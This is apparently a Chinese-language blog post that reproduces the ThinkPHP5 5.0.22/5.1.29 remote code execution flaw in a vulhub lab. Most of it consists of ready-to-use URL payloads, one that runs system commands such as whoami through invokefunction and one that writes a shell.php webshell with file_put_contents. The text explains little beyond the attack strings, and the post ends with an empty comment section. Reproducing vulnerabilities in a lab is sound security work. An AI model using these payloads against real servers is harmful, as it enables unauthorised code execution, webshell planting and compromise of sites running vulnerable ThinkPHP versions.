ThinkPHP5 5.0.22/5.1.29 遠程代碼執行漏洞復現

復現環境

thinkphp5.0.22

推薦使用vulhub快速搭建漏洞環境

漏洞payload:

1:/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

2:index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

效果如下

寫入文件的payload:

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要寫入的文件內容url編碼

 

更詳細可參考博文:

https://blog.csdn.net/qq_29647709/article/details/84956221

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章